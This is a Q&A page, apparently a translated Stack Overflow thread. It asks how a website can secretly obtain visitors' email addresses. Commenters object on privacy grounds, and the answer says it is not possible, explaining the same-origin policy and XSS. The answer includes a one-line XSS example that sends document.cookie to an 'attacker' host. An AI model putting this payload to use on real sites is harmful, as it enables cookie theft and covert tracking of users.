【问题标题】:script for fetching visitor E-mail id without popup用于在不弹出窗口的情况下获取访问者电子邮件 ID 的脚本
【发布时间】:2019-06-24 06:10:29
【问题描述】:

访问者访问网站后需要立即获取访问者电子邮件 ID。

不显示任何订阅或时事通讯的弹出窗口。

如果他/她已经登录到任何社交网站/邮件帐户,我们能否追踪访问者的电子邮件 ID??

有些网站在做这些事情。

【问题讨论】:

  • 它的隐私泄露......当用户不共享它时,您不应该获得详细信息。
  • 这叫跟踪。
  • "有些网站在做这些事情。"我很想问一个例子。即使那样,如果确实如此,您应该能够查看这些站点的源代码并自己找出答案。只要记住使用沙盒环境,您就不会希望您的隐私受到侵犯或任何事情!
  • 我知道存在隐私泄露,并且不能真正披露那些正在这样做的网站的名称。但是可能有我们需要集成到网站的第三方应用程序、产品或工具?? @Hoppeduppeanut

标签: javascript php jquery html database


【解决方案1】:

简而言之,除非已经知道用户电子邮件 ID 的网站希望公开分享,否则您不能这样做。

在同源策略下,网络浏览器允许包含在第一个网页中的脚本访问第二个网页中的数据,但前提是两个网页具有相同的来源。 [Wikipedia - Same-origin Policy]

withCredentials 的帮助下,可以支持跨域请求中的cookie。即使它不能直接访问您的代码。 withCredentials 指示是否应使用 cookie、授权标头或 TLS 客户端证书等凭据进行跨站点 Access-Control 请求。设置withCredentials 对同站点请求没有影响。 [Mozilla Dev]

您可以通过为跨站点脚本 (XSS) 注入 javascript 代码来访问同源 cookie。 XSS 是攻击者对网站进行的注入攻击,当用户加载该网站时,代码在客户端执行。 XSS 在 cookie 劫持、网络钓鱼甚至键盘记录方面很流行。

攻击示例:

<script>
    window.location='http://attacker/?cookie='+document.cookie
</script>

但即便如此,当加载该域时,它会为您提供该域的 cookie,而不是加载您的域时。

此答案仅用于学习目的

【讨论】:

    猜你喜欢
    • 1970-01-01
    • 1970-01-01
    • 2018-07-04
    • 2014-06-02
    • 2017-09-11
    • 1970-01-01
    • 1970-01-01
    • 2019-02-10
    • 1970-01-01
    相关资源
    最近更新 更多